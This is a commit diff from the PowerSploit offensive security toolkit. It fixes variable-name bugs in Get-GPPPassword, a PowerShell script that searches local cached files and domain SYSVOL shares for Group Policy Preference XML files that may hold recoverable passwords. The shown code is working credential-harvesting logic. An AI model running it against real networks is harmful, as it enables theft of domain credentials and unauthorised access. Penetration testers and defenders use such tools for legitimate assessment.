diff options
| author | HarmJ0y <will@harmj0y.net> | 2017-01-09 18:11:15 -0500 |
|---|---|---|
| committer | HarmJ0y <will@harmj0y.net> | 2017-01-09 18:11:15 -0500 |
| commit | 215ec25da051770bed4e6119f6e911f0ac5e11f7 (patch) | |
| tree | 46f3f43c769110765e78ec7bde2e55c03befd68e | |
| parent | 3f7a32d6237caa037b870aaa941a35e3761bf13c (diff) | |
| download | PowerSploit-215ec25da051770bed4e6119f6e911f0ac5e11f7.tar.gz PowerSploit-215ec25da051770bed4e6119f6e911f0ac5e11f7.zip | |
Bug fixes in Get-GPPPassword
| -rw-r--r-- | Exfiltration/Get-GPPPassword.ps1 | 13 |
1 files changed, 9 insertions, 4 deletions
diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index bb58667..f7be74c 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -296,12 +296,17 @@ http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html } try { - $XMlFiles = @() + $XMLFiles = @() $Domains = @() + $AllUsers = $Env:ALLUSERSPROFILE + if (-not $AllUsers) { + $AllUsers = 'C:\ProgramData' + } + # discover any locally cached GPP .xml files Write-Verbose '[Get-GPPPassword] Searching local host for any cached GPP files' - $MlFiles += Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue + $XMLFiles += Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue if ($SearchForest) { Write-Verbose '[Get-GPPPassword] Searching for all reachable trusts' @@ -325,11 +330,11 @@ http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html $DomainXMLFiles = Get-ChildItem -Force -Path "\\$Domain\SYSVOL\*\Policies" -Recurse -ErrorAction SilentlyContinue -Include @('Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml') if($DomainXMLFiles) { - $XMlFiles += $DomainXMLFiles + $XMLFiles += $DomainXMLFiles } } - if ( -not $XMlFiles ) { throw '[Get-GPPPassword] No preference files found.' } + if ( -not $XMLFiles ) { throw '[Get-GPPPassword] No preference files found.' } Write-Verbose "[Get-GPPPassword] Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." |